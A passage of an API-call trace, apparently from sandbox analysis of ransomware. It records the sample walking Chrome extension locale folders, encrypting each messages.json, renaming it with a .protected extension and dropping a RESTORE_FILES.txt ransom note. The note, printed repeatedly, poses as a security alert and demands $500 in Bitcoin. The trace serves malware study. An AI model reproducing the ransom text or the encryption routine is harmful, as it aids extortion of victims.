(lpString="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") returned 684 [0083.933] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.933] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.933] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.933] CloseHandle (hObject=0x164) returned 1 [0083.933] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.933] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0083.933] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0083.933] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0083.933] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0083.933] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0083.933] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro") returned 150 [0083.933] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0083.933] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0083.933] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\*") returned 152 [0083.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.934] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.934] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.934] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.934] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.934] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.934] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\.") returned 152 [0083.934] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.934] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.934] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.934] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.934] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.934] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.934] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.934] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\..") returned 153 [0083.934] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.934] 
lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.934] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.934] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.934] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.934] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.934] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.934] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.934] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json") returned 164 [0083.934] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.934] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.934] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.934] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.934] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.935] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json") returned 164 [0083.935] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json") returned 164 [0083.935] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json") returned 164 [0083.935] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.935] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.937] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.937] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.937] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.937] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.937] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.937] CloseHandle (hObject=0x168) returned 1 [0083.937] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.protected") returned 174 [0083.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\messages.json.protected")) returned 1 [0083.938] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.938] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.938] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\RESTORE_FILES.txt") returned 168 [0083.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.939] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.939] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, 
nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.939] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.939] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.939] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.939] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.939] CloseHandle (hObject=0x164) returned 1 [0083.940] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.940] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0083.940] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0083.940] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") 
returned 1 [0083.940] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0083.940] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0083.940] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru") returned 150 [0083.940] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0083.940] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0083.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\*") returned 152 [0083.940] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.940] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.940] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.940] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.940] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.940] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\.") returned 152 [0083.940] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.940] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 
[0083.940] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.940] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.940] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.940] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.940] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\..") returned 153 [0083.940] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.940] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.940] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.940] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.940] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.940] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.940] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.940] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json") returned 164 [0083.941] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.941] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.941] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.941] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.941] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json") returned 164 [0083.941] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json") returned 164 [0083.941] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json") returned 164 [0083.942] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.942] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.943] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0083.943] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.943] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.943] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.943] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.943] CloseHandle (hObject=0x168) returned 1 [0083.943] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.protected") returned 174 [0083.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\messages.json.protected")) returned 1 [0083.944] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.944] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.944] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\RESTORE_FILES.txt") returned 168 [0083.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ru\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.944] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.944] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.945] lstrlenA (lpString="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") returned 684 [0083.945] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.945] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.945] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
